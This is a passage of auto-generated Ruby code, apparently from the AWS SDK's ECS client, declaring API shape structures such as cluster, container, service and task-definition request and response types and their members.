DescribeClustersRequest = Shapes::StructureShape.new(name: 'DescribeClustersRequest')
DescribeClustersResponse = Shapes::StructureShape.new(name: 'DescribeClustersResponse')
DescribeContainerInstancesRequest = Shapes::StructureShape.new(name: 'DescribeContainerInstancesRequest')
DescribeContainerInstancesResponse = Shapes::StructureShape.new(name: 'DescribeContainerInstancesResponse')
DescribeServicesRequest = Shapes::StructureShape.new(name: 'DescribeServicesRequest')
DescribeServicesResponse = Shapes::StructureShape.new(name: 'DescribeServicesResponse')
DescribeTaskDefinitionRequest = Shapes::StructureShape.new(name: 'DescribeTaskDefinitionRequest')
DescribeTaskDefinitionResponse = Shapes::StructureShape.new(name: 'DescribeTaskDefinitionResponse')
DescribeTasksRequest = Shapes::StructureShape.new(name: 'DescribeTasksRequest')
DescribeTasksResponse = Shapes::StructureShape.new(name: 'DescribeTasksResponse')
DesiredStatus = Shapes::StringShape.new(name: 'DesiredStatus')
Device = Shapes::StructureShape.new(name: 'Device')
DeviceCgroupPermission = Shapes::StringShape.new(name: 'DeviceCgroupPermission')
DeviceCgroupPermissions = Shapes::ListShape.new(name: 'DeviceCgroupPermissions')
DevicesList = Shapes::ListShape.new(name: 'DevicesList')
DiscoverPollEndpointRequest = Shapes::StructureShape.new(name: 'DiscoverPollEndpointRequest')
DiscoverPollEndpointResponse = Shapes::StructureShape.new(name: 'DiscoverPollEndpointResponse')
DockerLabelsMap = Shapes::MapShape.new(name: 'DockerLabelsMap')
Double = Shapes::FloatShape.new(name: 'Double')
EnvironmentVariables = Shapes::ListShape.new(name: 'EnvironmentVariables')
Failure = Shapes::StructureShape.new(name: 'Failure')
Failures = Shapes::ListShape.new(name: 'Failures')
HealthCheck = Shapes::StructureShape.new(name: 'HealthCheck')
HealthStatus = Shapes::StringShape.new(name: 'HealthStatus')
HostEntry = Shapes::StructureShape.new(name: 'HostEntry')
HostEntryList = Shapes::ListShape.new(name: 'HostEntryList')
HostVolumeProperties = Shapes::StructureShape.new(name: 'HostVolumeProperties')
Integer = Shapes::IntegerShape.new(name: 'Integer')
InvalidParameterException = Shapes::StructureShape.new(name: 'InvalidParameterException')
KernelCapabilities = Shapes::StructureShape.new(name: 'KernelCapabilities')
KeyValuePair = Shapes::StructureShape.new(name: 'KeyValuePair')
LaunchType = Shapes::StringShape.new(name: 'LaunchType')
LinuxParameters = Shapes::StructureShape.new(name: 'LinuxParameters')
ListAttributesRequest = Shapes::StructureShape.new(name: 'ListAttributesRequest')
ListAttributesResponse = Shapes::StructureShape.new(name: 'ListAttributesResponse')
ListClustersRequest = Shapes::StructureShape.new(name: 'ListClustersRequest')
ListClustersResponse = Shapes::StructureShape.new(name: 'ListClustersResponse')
ListContainerInstancesRequest = Shapes::StructureShape.new(name: 'ListContainerInstancesRequest')
ListContainerInstancesResponse = Shapes::StructureShape.new(name: 'ListContainerInstancesResponse')
ListServicesRequest = Shapes::StructureShape.new(name: 'ListServicesRequest')
ListServicesResponse = Shapes::StructureShape.new(name: 'ListServicesResponse')
ListTaskDefinitionFamiliesRequest = Shapes::StructureShape.new(name: 'ListTaskDefinitionFamiliesRequest')
ListTaskDefinitionFamiliesResponse = Shapes::StructureShape.new(name: 'ListTaskDefinitionFamiliesResponse')
ListTaskDefinitionsRequest = Shapes::StructureShape.new(name: 'ListTaskDefinitionsRequest')
ListTaskDefinitionsResponse = Shapes::StructureShape.new(name: 'ListTaskDefinitionsResponse')
ListTasksRequest = Shapes::StructureShape.new(name: 'ListTasksRequest')
ListTasksResponse = Shapes::StructureShape.new(name: 'ListTasksResponse')
LoadBalancer = Shapes::StructureShape.new(name: 'LoadBalancer')
LoadBalancers = Shapes::ListShape.new(name: 'LoadBalancers')
LogConfiguration = Shapes::StructureShape.new(name: 'LogConfiguration')
LogConfigurationOptionsMap = Shapes::MapShape.new(name: 'LogConfigurationOptionsMap')
LogDriver = Shapes::StringShape.new(name: 'LogDriver')
Long = Shapes::IntegerShape.new(name: 'Long')
MissingVersionException = Shapes::StructureShape.new(name: 'MissingVersionException')
MountPoint = Shapes::StructureShape.new(name: 'MountPoint')
MountPointList = Shapes::ListShape.new(name: 'MountPointList')
NetworkBinding = Shapes::StructureShape.new(name: 'NetworkBinding')
NetworkBindings = Shapes::ListShape.new(name: 'NetworkBindings')
NetworkConfiguration = Shapes::StructureShape.new(name: 'NetworkConfiguration')
NetworkInterface = Shapes::StructureShape.new(name: 'NetworkInterface')
NetworkInterfaces = Shapes::ListShape.new(name: 'NetworkInterfaces')
NetworkMode = Shapes::StringShape.new(name: 'NetworkMode')
NoUpdateAvailableException = Shapes::StructureShape.new(name: 'NoUpdateAvailableException')
PlacementConstraint = Shapes::StructureShape.new(name: 'PlacementConstraint')
PlacementConstraintType = Shapes::StringShape.new(name: 'PlacementConstraintType')
PlacementConstraints = Shapes::ListShape.new(name: 'PlacementConstraints')
PlacementStrategies = Shapes::ListShape.new(name: 'PlacementStrategies')
PlacementStrategy = Shapes::StructureShape.new(name: 'PlacementStrategy')
PlacementStrategyType = Shapes::StringShape.new(name: 'PlacementStrategyType')
PlatformTaskDefinitionIncompatibilityException = Shapes::StructureShape.new(name: 'PlatformTaskDefinitionIncompatibilityException')
PlatformUnknownException = Shapes::StructureShape.new(name: 'PlatformUnknownException')
PortMapping = Shapes::StructureShape.new(name: 'PortMapping')
PortMappingList = Shapes::ListShape.new(name: 'PortMappingList')
PutAttributesRequest = Shapes::StructureShape.new(name: 'PutAttributesRequest')
PutAttributesResponse = Shapes::StructureShape.new(name: 'PutAttributesResponse')
RegisterContainerInstanceRequest = Shapes::StructureShape.new(name: 'RegisterContainerInstanceRequest')
RegisterContainerInstanceResponse = Shapes::StructureShape.new(name: 'RegisterContainerInstanceResponse')
RegisterTaskDefinitionRequest = Shapes::StructureShape.new(name: 'RegisterTaskDefinitionRequest')
RegisterTaskDefinitionResponse = Shapes::StructureShape.new(name: 'RegisterTaskDefinitionResponse')
RepositoryCredentials = Shapes::StructureShape.new(name: 'RepositoryCredentials')
RequiresAttributes = Shapes::ListShape.new(name: 'RequiresAttributes')
Resource = Shapes::StructureShape.new(name: 'Resource')
Resources = Shapes::ListShape.new(name: 'Resources')
RunTaskRequest = Shapes::StructureShape.new(name: 'RunTaskRequest')
RunTaskResponse = Shapes::StructureShape.new(name: 'RunTaskResponse')
SchedulingStrategy = Shapes::StringShape.new(name: 'SchedulingStrategy')
ServerException = Shapes::StructureShape.new(name: 'ServerException')
Service = Shapes::StructureShape.new(name: 'Service')
ServiceEvent = Shapes::StructureShape.new(name: 'ServiceEvent')
ServiceEvents = Shapes::ListShape.new(name: 'ServiceEvents')
ServiceNotActiveException = Shapes::StructureShape.new(name: 'ServiceNotActiveException')
ServiceNotFoundException = Shapes::StructureShape.new(name: 'ServiceNotFoundException')
ServiceRegistries = Shapes::ListShape.new(name: 'ServiceRegistries')
ServiceRegistry = Shapes::StructureShape.new(name: 'ServiceRegistry')
Services = Shapes::ListShape.new(name: 'Services')
SortOrder = Shapes::StringShape.new(name: 'SortOrder')
StartTaskRequest = Shapes::StructureShape.new(name: 'StartTaskRequest')
StartTaskResponse = Shapes::StructureShape.new(name: 'StartTaskResponse')
Statistics = Shapes::ListShape.new(name: 'Statistics')
StopTaskRequest = Shapes::StructureShape.new(name: 'StopTaskRequest')
StopTaskResponse = Shapes::StructureShape.new(name: 'StopTaskResponse')
String = Shapes::StringShape.new(name: 'String')
StringList = Shapes::ListShape.new(name: 'StringList')
SubmitContainerStateChangeRequest = Shapes::StructureShape.new(name: 'SubmitContainerStateChangeRequest')
SubmitContainerStateChangeResponse = Shapes::StructureShape.new(name: 'SubmitContainerStateChangeResponse')
SubmitTaskStateChangeRequest = Shapes::StructureShape.new(name: 'SubmitTaskStateChangeRequest')
SubmitTaskStateChangeResponse = Shapes::StructureShape.new(name: 'SubmitTaskStateChangeResponse')
TargetNotFoundException = Shapes::StructureShape.new(name: 'TargetNotFoundException')
TargetType = Shapes::StringShape.new(name: 'TargetType')
Task = Shapes::StructureShape.new(name: 'Task')
TaskDefinition = Shapes::StructureShape.new(name: 'TaskDefinition')
TaskDefinitionFamilyStatus = Shapes::StringShape.new(name: 'TaskDefinitionFamilyStatus')
TaskDefinitionPlacementConstraint = Shapes::StructureShape.new(name: 'TaskDefinitionPlacementConstraint')
TaskDefinitionPlacementConstraintType = Shapes::StringShape.new(name: 'TaskDefinitionPlacementConstraintType')
TaskDefinitionPlacementConstraints = Shapes::ListShape.new(name: 'TaskDefinitionPlacementConstraints')
TaskDefinitionStatus = Shapes::StringShape.new(name: 'TaskDefinitionStatus')
TaskOverride = Shapes::StructureShape.new(name: 'TaskOverride')
Tasks = Shapes::ListShape.new(name: 'Tasks')
Timestamp = Shapes::TimestampShape.new(name: 'Timestamp')
Tmpfs = Shapes::StructureShape.new(name: 'Tmpfs')
TmpfsList = Shapes::ListShape.new(name: 'TmpfsList')
TransportProtocol = Shapes::StringShape.new(name: 'TransportProtocol')
Ulimit = Shapes::StructureShape.new(name: 'Ulimit')
UlimitList = Shapes::ListShape.new(name: 'UlimitList')
UlimitName = Shapes::StringShape.new(name: 'UlimitName')
UnsupportedFeatureException = Shapes::StructureShape.new(name: 'UnsupportedFeatureException')
UpdateContainerAgentRequest = Shapes::StructureShape.new(name: 'UpdateContainerAgentRequest')
UpdateContainerAgentResponse = Shapes::StructureShape.new(name: 'UpdateContainerAgentResponse')
UpdateContainerInstancesStateRequest = Shapes::StructureShape.new(name: 'UpdateContainerInstancesStateRequest')
UpdateContainerInstancesStateResponse = Shapes::StructureShape.new(name: 'UpdateContainerInstancesStateResponse')
UpdateInProgressException = Shapes::StructureShape.new(name: 'UpdateInProgressException')
UpdateServiceRequest = Shapes::StructureShape.new(name: 'UpdateServiceRequest')
UpdateServiceResponse = Shapes::StructureShape.new(name: 'UpdateServiceResponse')
VersionInfo = Shapes::StructureShape.new(name: 'VersionInfo')
Volume = Shapes::StructureShape.new(name: 'Volume')
VolumeFrom = Shapes::StructureShape.new(name: 'VolumeFrom')
VolumeFromList = Shapes::ListShape.new(name: 'VolumeFromList')
VolumeList = Shapes::ListShape.new(name: 'VolumeList')
Attachment.add_member(:id, Shapes::ShapeRef.new(shape: String, location_name: "id"))
Attachment.add_member(:type, Shapes::ShapeRef.new(shape: String, location_name: "type"))
Attachment.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Attachment.add_member(:details, Shapes::ShapeRef.new(shape: AttachmentDetails, location_name: "details"))
Attachment.struct_class = Types::Attachment
AttachmentDetails.member = Shapes::ShapeRef.new(shape: KeyValuePair)
AttachmentStateChange.add_member(:attachment_arn, Shapes::ShapeRef.new(shape: String, required: true, location_name: "attachmentArn"))
AttachmentStateChange.add_member(:status, Shapes::ShapeRef.new(shape: String, required: true, location_name: "status"))
AttachmentStateChange.struct_class = Types::AttachmentStateChange
AttachmentStateChanges.member = Shapes::ShapeRef.new(shape: AttachmentStateChange)
Attachments.member = Shapes::ShapeRef.new(shape: Attachment)
Attribute.add_member(:name, Shapes::ShapeRef.new(shape: String, required: true, location_name: "name"))
Attribute.add_member(:value, Shapes::ShapeRef.new(shape: String, location_name: "value"))
Attribute.add_member(:target_type, Shapes::ShapeRef.new(shape: TargetType, location_name: "targetType"))
Attribute.add_member(:target_id, Shapes::ShapeRef.new(shape: String, location_name: "targetId"))
Attribute.struct_class = Types::Attribute
Attributes.member = Shapes::ShapeRef.new(shape: Attribute)
AwsVpcConfiguration.add_member(:subnets, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "subnets"))
AwsVpcConfiguration.add_member(:security_groups, Shapes::ShapeRef.new(shape: StringList, location_name: "securityGroups"))
AwsVpcConfiguration.add_member(:assign_public_ip, Shapes::ShapeRef.new(shape: AssignPublicIp, location_name: "assignPublicIp"))
AwsVpcConfiguration.struct_class = Types::AwsVpcConfiguration
Cluster.add_member(:cluster_arn, Shapes::ShapeRef.new(shape: String, location_name: "clusterArn"))
Cluster.add_member(:cluster_name, Shapes::ShapeRef.new(shape: String, location_name: "clusterName"))
Cluster.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Cluster.add_member(:registered_container_instances_count, Shapes::ShapeRef.new(shape: Integer, location_name: "registeredContainerInstancesCount"))
Cluster.add_member(:running_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningTasksCount"))
Cluster.add_member(:pending_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingTasksCount"))
Cluster.add_member(:active_services_count, Shapes::ShapeRef.new(shape: Integer, location_name: "activeServicesCount"))
Cluster.add_member(:statistics, Shapes::ShapeRef.new(shape: Statistics, location_name: "statistics"))
Cluster.struct_class = Types::Cluster
ClusterFieldList.member = Shapes::ShapeRef.new(shape: ClusterField)
Clusters.member = Shapes::ShapeRef.new(shape: Cluster)
CompatibilityList.member = Shapes::ShapeRef.new(shape: Compatibility)
Container.add_member(:container_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerArn"))
Container.add_member(:task_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskArn"))
Container.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
Container.add_member(:last_status, Shapes::ShapeRef.new(shape: String, location_name: "lastStatus"))
Container.add_member(:exit_code, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "exitCode"))
Container.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
Container.add_member(:network_bindings, Shapes::ShapeRef.new(shape: NetworkBindings, location_name: "networkBindings"))
Container.add_member(:network_interfaces, Shapes::ShapeRef.new(shape: NetworkInterfaces, location_name: "networkInterfaces"))
Container.add_member(:health_status, Shapes::ShapeRef.new(shape: HealthStatus, location_name: "healthStatus"))
Container.struct_class = Types::Container
ContainerDefinition.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
ContainerDefinition.add_member(:image, Shapes::ShapeRef.new(shape: String, location_name: "image"))
ContainerDefinition.add_member(:repository_credentials, Shapes::ShapeRef.new(shape: RepositoryCredentials, location_name: "repositoryCredentials"))
ContainerDefinition.add_member(:cpu, Shapes::ShapeRef.new(shape: Integer, location_name: "cpu"))
ContainerDefinition.add_member(:memory, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memory"))
ContainerDefinition.add_member(:memory_reservation, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memoryReservation"))
ContainerDefinition.add_member(:links, Shapes::ShapeRef.new(shape: StringList, location_name: "links"))
ContainerDefinition.add_member(:port_mappings, Shapes::ShapeRef.new(shape: PortMappingList, location_name: "portMappings"))
ContainerDefinition.add_member(:essential, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "essential"))
ContainerDefinition.add_member(:entry_point, Shapes::ShapeRef.new(shape: StringList, location_name: "entryPoint"))
ContainerDefinition.add_member(:command, Shapes::ShapeRef.new(shape: StringList, location_name: "command"))
ContainerDefinition.add_member(:environment, Shapes::ShapeRef.new(shape: EnvironmentVariables, location_name: "environment"))
ContainerDefinition.add_member(:mount_points, Shapes::ShapeRef.new(shape: MountPointList, location_name: "mountPoints"))
ContainerDefinition.add_member(:volumes_from, Shapes::ShapeRef.new(shape: VolumeFromList, location_name: "volumesFrom"))
ContainerDefinition.add_member(:linux_parameters, Shapes::ShapeRef.new(shape: LinuxParameters, location_name: "linuxParameters"))
ContainerDefinition.add_member(:hostname, Shapes::ShapeRef.new(shape: String, location_name: "hostname"))
ContainerDefinition.add_member(:user, Shapes::ShapeRef.new(shape: String, location_name: "user"))
ContainerDefinition.add_member(:working_directory, Shapes::ShapeRef.new(shape: String, location_name: "workingDirectory"))
ContainerDefinition.add_member(:disable_networking, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "disableNetworking"))
ContainerDefinition.add_member(:privileged, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "privileged"))
ContainerDefinition.add_member(:readonly_root_filesystem, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "readonlyRootFilesystem"))
ContainerDefinition.add_member(:dns_servers, Shapes::ShapeRef.new(shape: StringList, location_name: "dnsServers"))
ContainerDefinition.add_member(:dns_search_domains, Shapes::ShapeRef.new(shape: StringList, location_name: "dnsSearchDomains"))
ContainerDefinition.add_member(:extra_hosts, Shapes::ShapeRef.new(shape: HostEntryList, location_name: "extraHosts"))
ContainerDefinition.add_member(:docker_security_options, Shapes::ShapeRef.new(shape: StringList, location_name: "dockerSecurityOptions"))
ContainerDefinition.add_member(:docker_labels, Shapes::ShapeRef.new(shape: DockerLabelsMap, location_name: "dockerLabels"))
ContainerDefinition.add_member(:ulimits, Shapes::ShapeRef.new(shape: UlimitList, location_name: "ulimits"))
ContainerDefinition.add_member(:log_configuration, Shapes::ShapeRef.new(shape: LogConfiguration, location_name: "logConfiguration"))
ContainerDefinition.add_member(:health_check, Shapes::ShapeRef.new(shape: HealthCheck, location_name: "healthCheck"))
ContainerDefinition.struct_class = Types::ContainerDefinition
ContainerDefinitions.member = Shapes::ShapeRef.new(shape: ContainerDefinition)
ContainerInstance.add_member(:container_instance_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerInstanceArn"))
ContainerInstance.add_member(:ec2_instance_id, Shapes::ShapeRef.new(shape: String, location_name: "ec2InstanceId"))
ContainerInstance.add_member(:version, Shapes::ShapeRef.new(shape: Long, location_name: "version"))
ContainerInstance.add_member(:version_info, Shapes::ShapeRef.new(shape: VersionInfo, location_name: "versionInfo"))
ContainerInstance.add_member(:remaining_resources, Shapes::ShapeRef.new(shape: Resources, location_name: "remainingResources"))
ContainerInstance.add_member(:registered_resources, Shapes::ShapeRef.new(shape: Resources, location_name: "registeredResources"))
ContainerInstance.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
ContainerInstance.add_member(:agent_connected, Shapes::ShapeRef.new(shape: Boolean, location_name: "agentConnected"))
ContainerInstance.add_member(:running_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningTasksCount"))
ContainerInstance.add_member(:pending_tasks_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingTasksCount"))
ContainerInstance.add_member(:agent_update_status, Shapes::ShapeRef.new(shape: AgentUpdateStatus, location_name: "agentUpdateStatus"))
ContainerInstance.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
ContainerInstance.add_member(:registered_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "registeredAt"))
ContainerInstance.add_member(:attachments, Shapes::ShapeRef.new(shape: Attachments, location_name: "attachments"))
ContainerInstance.struct_class = Types::ContainerInstance
ContainerInstances.member = Shapes::ShapeRef.new(shape: ContainerInstance)
ContainerOverride.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
ContainerOverride.add_member(:command, Shapes::ShapeRef.new(shape: StringList, location_name: "command"))
ContainerOverride.add_member(:environment, Shapes::ShapeRef.new(shape: EnvironmentVariables, location_name: "environment"))
ContainerOverride.add_member(:cpu, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "cpu"))
ContainerOverride.add_member(:memory, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memory"))
ContainerOverride.add_member(:memory_reservation, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "memoryReservation"))
ContainerOverride.struct_class = Types::ContainerOverride
ContainerOverrides.member = Shapes::ShapeRef.new(shape: ContainerOverride)
ContainerStateChange.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
ContainerStateChange.add_member(:exit_code, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "exitCode"))
ContainerStateChange.add_member(:network_bindings, Shapes::ShapeRef.new(shape: NetworkBindings, location_name: "networkBindings"))
ContainerStateChange.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
ContainerStateChange.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
ContainerStateChange.struct_class = Types::ContainerStateChange
ContainerStateChanges.member = Shapes::ShapeRef.new(shape: ContainerStateChange)
Containers.member = Shapes::ShapeRef.new(shape: Container)
CreateClusterRequest.add_member(:cluster_name, Shapes::ShapeRef.new(shape: String, location_name: "clusterName"))
CreateClusterRequest.struct_class = Types::CreateClusterRequest
CreateClusterResponse.add_member(:cluster, Shapes::ShapeRef.new(shape: Cluster, location_name: "cluster"))
CreateClusterResponse.struct_class = Types::CreateClusterResponse
CreateServiceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
CreateServiceRequest.add_member(:service_name, Shapes::ShapeRef.new(shape: String, required: true, location_name: "serviceName"))
CreateServiceRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
CreateServiceRequest.add_member(:load_balancers, Shapes::ShapeRef.new(shape: LoadBalancers, location_name: "loadBalancers"))
CreateServiceRequest.add_member(:service_registries, Shapes::ShapeRef.new(shape: ServiceRegistries, location_name: "serviceRegistries"))
CreateServiceRequest.add_member(:desired_count, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "desiredCount"))
CreateServiceRequest.add_member(:client_token, Shapes::ShapeRef.new(shape: String, location_name: "clientToken"))
CreateServiceRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
CreateServiceRequest.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
CreateServiceRequest.add_member(:role, Shapes::ShapeRef.new(shape: String, location_name: "role"))
CreateServiceRequest.add_member(:deployment_configuration, Shapes::ShapeRef.new(shape: DeploymentConfiguration, location_name: "deploymentConfiguration"))
CreateServiceRequest.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: PlacementConstraints, location_name: "placementConstraints"))
CreateServiceRequest.add_member(:placement_strategy, Shapes::ShapeRef.new(shape: PlacementStrategies, location_name: "placementStrategy"))
CreateServiceRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
CreateServiceRequest.add_member(:health_check_grace_period_seconds, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "healthCheckGracePeriodSeconds"))
CreateServiceRequest.add_member(:scheduling_strategy, Shapes::ShapeRef.new(shape: SchedulingStrategy, location_name: "schedulingStrategy"))
CreateServiceRequest.struct_class = Types::CreateServiceRequest
CreateServiceResponse.add_member(:service, Shapes::ShapeRef.new(shape: Service, location_name: "service"))
CreateServiceResponse.struct_class = Types::CreateServiceResponse
DeleteAttributesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DeleteAttributesRequest.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, required: true, location_name: "attributes"))
DeleteAttributesRequest.struct_class = Types::DeleteAttributesRequest
DeleteAttributesResponse.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
DeleteAttributesResponse.struct_class = Types::DeleteAttributesResponse
DeleteClusterRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, required: true, location_name: "cluster"))
DeleteClusterRequest.struct_class = Types::DeleteClusterRequest
DeleteClusterResponse.add_member(:cluster, Shapes::ShapeRef.new(shape: Cluster, location_name: "cluster"))
DeleteClusterResponse.struct_class = Types::DeleteClusterResponse
DeleteServiceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DeleteServiceRequest.add_member(:service, Shapes::ShapeRef.new(shape: String, required: true, location_name: "service"))
DeleteServiceRequest.add_member(:force, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "force"))
DeleteServiceRequest.struct_class = Types::DeleteServiceRequest
DeleteServiceResponse.add_member(:service, Shapes::ShapeRef.new(shape: Service, location_name: "service"))
DeleteServiceResponse.struct_class = Types::DeleteServiceResponse
Deployment.add_member(:id, Shapes::ShapeRef.new(shape: String, location_name: "id"))
Deployment.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Deployment.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinition"))
Deployment.add_member(:desired_count, Shapes::ShapeRef.new(shape: Integer, location_name: "desiredCount"))
Deployment.add_member(:pending_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingCount"))
Deployment.add_member(:running_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningCount"))
Deployment.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
Deployment.add_member(:updated_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "updatedAt"))
Deployment.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
Deployment.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
Deployment.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
Deployment.struct_class = Types::Deployment
DeploymentConfiguration.add_member(:maximum_percent, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maximumPercent"))
DeploymentConfiguration.add_member(:minimum_healthy_percent, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "minimumHealthyPercent"))
DeploymentConfiguration.struct_class = Types::DeploymentConfiguration
Deployments.member = Shapes::ShapeRef.new(shape: Deployment)
DeregisterContainerInstanceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DeregisterContainerInstanceRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, required: true, location_name: "containerInstance"))
DeregisterContainerInstanceRequest.add_member(:force, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "force"))
DeregisterContainerInstanceRequest.struct_class = Types::DeregisterContainerInstanceRequest
DeregisterContainerInstanceResponse.add_member(:container_instance, Shapes::ShapeRef.new(shape: ContainerInstance, location_name: "containerInstance"))
DeregisterContainerInstanceResponse.struct_class = Types::DeregisterContainerInstanceResponse
DeregisterTaskDefinitionRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
DeregisterTaskDefinitionRequest.struct_class = Types::DeregisterTaskDefinitionRequest
DeregisterTaskDefinitionResponse.add_member(:task_definition, Shapes::ShapeRef.new(shape: TaskDefinition, location_name: "taskDefinition"))
DeregisterTaskDefinitionResponse.struct_class = Types::DeregisterTaskDefinitionResponse
DescribeClustersRequest.add_member(:clusters, Shapes::ShapeRef.new(shape: StringList, location_name: "clusters"))
DescribeClustersRequest.add_member(:include, Shapes::ShapeRef.new(shape: ClusterFieldList, location_name: "include"))
DescribeClustersRequest.struct_class = Types::DescribeClustersRequest
DescribeClustersResponse.add_member(:clusters, Shapes::ShapeRef.new(shape: Clusters, location_name: "clusters"))
DescribeClustersResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeClustersResponse.struct_class = Types::DescribeClustersResponse
DescribeContainerInstancesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DescribeContainerInstancesRequest.add_member(:container_instances, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "containerInstances"))
DescribeContainerInstancesRequest.struct_class = Types::DescribeContainerInstancesRequest
DescribeContainerInstancesResponse.add_member(:container_instances, Shapes::ShapeRef.new(shape: ContainerInstances, location_name: "containerInstances"))
DescribeContainerInstancesResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeContainerInstancesResponse.struct_class = Types::DescribeContainerInstancesResponse
DescribeServicesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DescribeServicesRequest.add_member(:services, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "services"))
DescribeServicesRequest.struct_class = Types::DescribeServicesRequest
DescribeServicesResponse.add_member(:services, Shapes::ShapeRef.new(shape: Services, location_name: "services"))
DescribeServicesResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeServicesResponse.struct_class = Types::DescribeServicesResponse
DescribeTaskDefinitionRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
DescribeTaskDefinitionRequest.struct_class = Types::DescribeTaskDefinitionRequest
DescribeTaskDefinitionResponse.add_member(:task_definition, Shapes::ShapeRef.new(shape: TaskDefinition, location_name: "taskDefinition"))
DescribeTaskDefinitionResponse.struct_class = Types::DescribeTaskDefinitionResponse
DescribeTasksRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DescribeTasksRequest.add_member(:tasks, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "tasks"))
DescribeTasksRequest.struct_class = Types::DescribeTasksRequest
DescribeTasksResponse.add_member(:tasks, Shapes::ShapeRef.new(shape: Tasks, location_name: "tasks"))
DescribeTasksResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeTasksResponse.struct_class = Types::DescribeTasksResponse
Device.add_member(:host_path, Shapes::ShapeRef.new(shape: String, required: true, location_name: "hostPath"))
Device.add_member(:container_path, Shapes::ShapeRef.new(shape: String, location_name: "containerPath"))
Device.add_member(:permissions, Shapes::ShapeRef.new(shape: DeviceCgroupPermissions, location_name: "permissions"))
Device.struct_class = Types::Device
DeviceCgroupPermissions.member = Shapes::ShapeRef.new(shape: DeviceCgroupPermission)
DevicesList.member = Shapes::ShapeRef.new(shape: Device)
DiscoverPollEndpointRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, location_name: "containerInstance"))
DiscoverPollEndpointRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DiscoverPollEndpointRequest.struct_class = Types::DiscoverPollEndpointRequest
DiscoverPollEndpointResponse.add_member(:endpoint, Shapes::ShapeRef.new(shape: String, location_name: "endpoint"))
